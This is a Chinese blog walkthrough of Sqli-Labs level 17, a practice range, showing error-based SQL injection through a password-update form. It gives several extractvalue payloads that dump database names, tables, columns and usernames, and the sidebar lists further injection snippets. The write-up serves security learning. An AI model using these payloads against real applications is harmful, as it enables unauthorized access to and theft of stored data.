Less-17 【异常报错】

最新推荐文章于 2024-03-03 13:17:00 发布
最新推荐文章于 2024-03-03 13:17:00 发布
阅读量158 收藏
点赞数
分类专栏: Sqli-Labs 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45939134/article/details/130780927
版权

目录

第十七关

1、找寻注入点

2、验证闭合方式

3、异常报错

4、查看所有数据库

5、查看当前数据库

6、获取security数据库下的所有数据表

7、获取security数据库下users表中所有字段名

8、获取users表中username字段下第一个数据,以第0位为起点向后推进1位(不包括0)

第十七关

1、找寻注入点

我们在User Name输入的任何字符发现都没有报错,所以我们去尝试一下在New Password的文本框试一下。

发现报错,查看报错信息发现存在单引号注入问题。

2、验证闭合方式

在后面加上注释查看页面是否成功执行

3、异常报错

页面成功执行了,根据前面那么多关的经验,我们可以清晰的看出他肯定没有回显的位置。

所以我们采用异常报错的方式。查看是否会抛出异常错误

' and extractvalue(1,0x7e) -- +

4、查看所有数据库

' or extractvalue(1,concat(0x7e,substr((select binary(group_concat(schema_name)) from information_schema.schemata),1,32),0x7e)) -- +

因为它报错回显的字符数量有限,所以我们需要更改1,32的1,以第1位开始往后32位的字符(其中包括第1位)

5、查看当前数据库

' and extractvalue(1,concat(0x7e,(select database()))) -- +

6、获取security数据库下的所有数据表

' or extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e)) -- +

7、获取security数据库下users表中所有字段名

' or extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e)) -- +

8、获取users表中username字段下第一个数据,以第0位为起点向后推进1位(不包括0)

' or extractvalue(1,concat(0x7e,(select * from (select username from users limit 0,1) a),0x7e)) -- +

我们逐步去拿数据,其中可能会比较浪费时间,可以选择用sqlmap工具。

到此闯关完成,闯关结束。

'tubug'
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
sqli-labs学习笔记(六)less 17 绕过过滤
闵行小鱼塘
09-10 724
继续学习sqli-labs,本篇是less17
less-plugin-autoprefix:添加了由 autoprefixer 对 less 进行后处理的能力
05-29
npm install -g less-plugin-autoprefix 然后在命令行上, lessc file.less --autoprefix="browsers" 浏览器是由逗号分隔的列表。 程序化用法 var LessPluginAutoPrefix = require ( 'less-plugin-autoprefix' )...
floor注入的两种格式
aitong的博客
01-31 454
联合查询 http://127.0.0.1/sqli-labs/less-6/?id=1" union select null,count(*),concat((select group_concat(table_name) from information_schema.tables where table_schema=database()),floor(rand(0)*2))x from users group by x--+ 其中1是因为联合查询列数要相同所以补个1,换成null也可以 users可
sqli-lab less-17
qq_45455136的博客
07-14 366
sqli-lab less-17注入extractvalue()updatexml()盲注+sqlmap less-17的提示是可注入的sql语句update,注入类型为字符型,传参方式为post。 php中对uname进行了特殊符号过滤并且限制了长度,无法通过select处的uname来进行注入,只能通过update处的passwd来进行注入。通过查看php发现能输出mysql误信息,可以进行注入。 注入 extractvalue() 语法:extractvalue(目标xml文档,xml
Sqli-labs之Less-17
m0_46315342的博客
06-04 630
                                          &nbs...
sqli-labs ————less -17
Fly_鹏程万里
05-12 862
Less-17源代码如下:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head&..
less-plugin-clean-css:使用clean-css对CSS进行后期处理和压缩
02-23
npm install -g less-plugin-clean-css 然后在命令行上 lessc file.less --clean-css="--s1 --advanced --compatibility=ie8" 见的可用命令选项-唯一的区别是advanced和rebase ,我们默认为false,因为它并不总是...
less-plugin-lists:更少的ListArray操作
05-13
少插件列表 用于列表/数组操作的插件。...npm install -g less-plugin-lists 与lessc使用 lessc --lists file.less 有关通过命令行Less编译器使用插件的更多详细信息,请参见Less文档中的相应部分。
Webpack中css-loader和less-loader的使用教程
12-03
本文将详细介绍如何在Webpack配置中使用`css-loader`和`less-loader`。 ### 一、css-loader `css-loader`的主要功能是解析CSS文件,使其能够在JavaScript中被导入。通过`require`或`import`语句,你可以将CSS文件...
mrcrowl.easy-less-1.7.2.zip
03-25
《深入解析mrcrowl.easy-less-1.7.2.zip:轻松驾驭LESS语言的VSCode插件》 在Web开发领域,LESS是一种强大的CSS预处理器,它扩展了CSS的功能,引入了变量、嵌套规则、混合(mixins)以及函数等特性,使得CSS代码...
基于Sqli-Labs靶场的SQL注入-17~22关
Joker
01-03 1659
这一篇博客我主要讲了HTTP头部注入中的 UA、Referer、Cookie 注入以及 base-64编码。
sqlmap刷sqllibs_03-header注入-17-22
Xor0ne
07-28 1185
17、less17-Update Query- Error based - String 在这一关中,uname参数经过了check_in()函数过滤,因此如果我们直接按照之前的进行过滤的话就会发现sqlmap很有可能会跑很久,这是因为uname不可注入,因此sqlmap就尝试这一切方法对他进行注入,所以时间花费很长。但是另外一个参数passwd并没有进行过滤,我们进行注入时就要指定参数。 本关同于第11关,具体语句不一一赘述了。 下面为sqlmap给出的payload: C:\Python27\sqlma
Sqli-labs靶场第17关详解[Sqli-labs-less-17]自动化注入-SQLmap工具注入
最新发布
m0_73615178的博客
03-03 781
根据题目及测试发现,注入点在New Password上并且后台会判断user是否存在,所以user选择一个知道的name:admin或domo。如果当前会话用户对包含 DBMS 可用数据库信息的系统表有读取权限,则可以枚举出当前数据库列表。,所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件。单引号 '闭合 -- 注入。爆出DBMS 所有数据库。
Sqli-Labs靶场(17--20)题解析
weixin_46099095的博客
03-14 4169
Less-17:POST - Update Query - Error Based - String(POST - 更新查询 - 基于误 - 字符串) 这里无论我们在User Name栏输入什么除了正确的用户名admin,他都会,难道这题就没有注入点啦? 来,我们先看一下源码 左边是Less-16的源码,右边是Less-17的源码,看不懂每关系,我也看不懂,但是知道uname多了一个东
linux使用less排查日志文件
dj1540225203的博客
08-03 3118
less
sqli-labs(less-17)
筱阳的博客
06-09 3854
首先要介绍UpdateXML('xml_target','xpath_expr','new_xml')举个例子就知道了可以看到,uname用check_input()函数进行了处理看看是如何处理的只截取15个字符get_magic_quotes_gpc()当magic_quotes_gpc=On的时候,函数get_magic_quotes_gpc()就会返回1当magic_quotes_gpc=O...
Sqli-labs Less17 型更新语句盲注 - POST
kevinhanser
08-09 916
本文记录 SQL 注入的学习过程,资料为 SQLi SQLi 博客目录 Less - 17: POST - Update Query - Error Based- String 测试漏洞 本关我们可以看到是一个修改密码的过程 username 输入 admin password 输入 pass' 显示误信息 You have an error in your SQL...
less学习笔记 27/8/17
lumot的博客
09-05 108
less最新官网 http://less.bootcss.com/ Less 是一种动态的样式语言。Less扩展了CSS的动态行为,比如说,设置变量(Variables)、混合书写模式(mixin...
less14~less-17
qq_44598397的博客
03-26 288
LESS-14 输入:admin” 由此可见这个有误提示且为双引号闭合; 由于有提醒故可用注入: admin" and extractvalue(1,concat(0x7e,(select database()),0x7e))# Admin” and extractvalue(1,concat(0x7e,(select table_name from information_schem...
npm install less-loader
05-03
如果在使用 `npm install less-loader` 安装时出现误,可能有以下几种原因: 1. 本地网络问题:检查一下网络是否正常,可以尝试使用 VPN 或者换一个网络环境再次尝试安装。 2. npm 配置问题:有时候可能是 npm ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

'tubug'

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值